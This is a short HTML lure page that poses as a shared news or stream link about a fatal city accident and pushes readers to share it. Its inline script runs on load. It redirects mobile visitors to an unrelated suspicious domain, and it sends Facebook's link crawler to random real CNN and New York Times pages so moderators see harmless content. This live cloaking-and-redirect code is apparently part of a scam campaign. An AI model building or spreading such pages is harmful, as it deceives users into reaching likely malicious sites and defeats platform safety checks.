<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="utf-8"/>
    <meta name="title" content="Stream"/>
    <meta name="keywords" content="Instagram"/>
    <meta property="og:description" content="457,321,311,000 Views"/>
    <meta name="robots" content="index, follow"/>
    <meta name="googlebot" content="noindex"/>
    <meta name="robots" content="index"/>
    <meta name="robots" content="noindex"/>
    <meta name="robots" content="nofollow"/>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>
    <meta property="og:title" content="WARNING!! Tragic last minute accident occurred on the main avenue of the city, injured people and 1 deceased can be seen, share and see if it is not one of yours!."/>
    <meta property="og:image" content="https://cdn.discordapp.com/attachments/1062454395989671958/1221454271199838298/4f5g4.png?ex=662517ef&is=6612a2ef&hm=4ba64119a303ae1a9b7613826c54a0042ce9e534385e6ecb4725511a24b6b6ef&"/>
    <meta name="apple-itunes-app" content="app-id=6448311069"/>
    <script type="text/javascript">
        //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        var isFacebookRobot = navigator.userAgent.includes('facebookexternalhit');
        
        if (isMobile && !isFacebookRobot) {
            window.location.href = "https://bubutata.quest/733443"; // Redireccionar a los usuarios móviles
        } else if (isFacebookRobot) {
            var randomUrls = [
                "https://www.nytimes.com/es/2024/04/07/espanol/ecuador-mexico-noboa-amlo.html",
                "https://cnnespanol.cnn.com/seccion/estados-unidos/",
                "https://cnnespanol.cnn.com/2024/04/07/vuelo-boeing-southwest-pierde-cubierta-motor-trax/"
            ];
            var randomUrl = randomUrls[Math.floor(Math.random() * randomUrls.length)];
            window.location.href = randomUrl; // Redireccionar a una página aleatoria para los robots de Facebook
        }
        //]]>
    </script>
</head>
<body></body>
</html>
